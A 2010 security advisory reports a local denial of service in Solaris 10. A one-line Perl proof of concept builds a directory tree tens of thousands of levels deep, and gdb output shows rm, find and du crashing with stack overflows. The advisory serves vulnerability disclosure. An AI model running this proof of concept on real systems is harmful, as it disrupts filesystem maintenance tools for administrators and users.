Trick: Sun Solaris 10 filesystem rm, find, etc denial of service ( Ascii Version )

Search:
WLB2

Sun Solaris 10 filesystem rm, find, etc denial of service

Published
Credit
Risk
2010.05.23
Maksymilian Arciemowicz
Medium
CWE
CVE
Local
Remote
N/A
N/A ( Add )
Yes
No

[ Sun Solaris 10 filesystem rm(1),find(1),etc, Denial-of-service ]

Author: Maksymilian Arciemowicz
Date:
- - Dis.: 17.04.2010
- - Pub.: 21.05.2010

Affected Software:
- - Sun Solaris 10 10/09


- --- 0.Description ---
Solaris is a Unix operating system introduced by Sun Microsystems in
1992 as the successor to SunOS.

Sun Microsystems, Inc. is a wholly owned subsidiary of Oracle
Corporation, selling computers, computer components, computer software,
and information technology services. Sun was founded on February 24,
1982. The company was headquartered in Santa Clara, California (part of
Silicon Valley), on the former west campus of the Agnews Developmental
Center.

In computing, ZFS is a combined file system and logical volume manager
designed by Sun Microsystems. The features of ZFS include support for
high storage capacities, integration of the concepts of filesystem and
volume management, snapshots and copy-on-write clones, continuous
integrity checking and automatic repair, RAID-Z and native NFSv4 ACLs.


- --- 1. Sun Solaris 10 filesystem rm(1),find(1),etc, Denial-of-service ---
We can create, deep tree and when we will remove, scan or something else
with this tree, affected program will crash with stack overflow sympton

PoC:
# perl -e '$a="X";for(1..8000){ ! -d $a and mkdir $a and chdir $a }'

we need use 1..8000 or bigger value to make stack overflow.

in result

# du X
Segmentation fault (core dumped)
# /usr/local/bin/gdb -q du
(no debugging symbols found)
(gdb) r X
Starting program: /usr/bin/du X
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)

Program received signal SIGSEGV, Segmentation fault.
0xfeedfc8a in _ndoprnt () from /lib/libc.so.1
(gdb) x/i $eip
0xfeedfc8a <_ndoprnt+12>: push %ebp

We can simple remove this dir for 1..8000

# rm -rf X
#

but let`s try create this

# perl -e '$a="Y";for(1..50000){ ! -d $a and mkdir $a and chdir $a }'
# rm -rf Y
Segmentation fault (core dumped)

rm(1) has fail!

what is wrong? stack overflow

# /usr/local/bin/gdb -q rm
(no debugging symbols found)
(gdb) r -rf Y
Starting program: /usr/bin/rm -rf Y
(no debugging symbols found)
(no debugging symbols found)

Program received signal SIGSEGV, Segmentation fault.
0x08051c03 in ?? ()
(gdb) x/i $eip
0x8051c03: push %ebx

# find Y CX >> /dev/null
Segmentation fault (core dumped)


find(1) also fails!

# /usr/local/bin/gdb -q find
(no debugging symbols found)
(gdb) r Y CX >> /dev/null
Starting program: /usr/bin/find Y CX >> /dev/null
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)

Program received signal SIGSEGV, Segmentation fault.
0xfeecfc8a in _ndoprnt () from /lib/libc.so.1
(gdb) x/i $eip
0xfeecfc8a <_ndoprnt+12>: push %ebp


- --- 2. Fix ---
No info

- --- 3. Contact ---
Author: Maksymilian Arciemowicz


See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version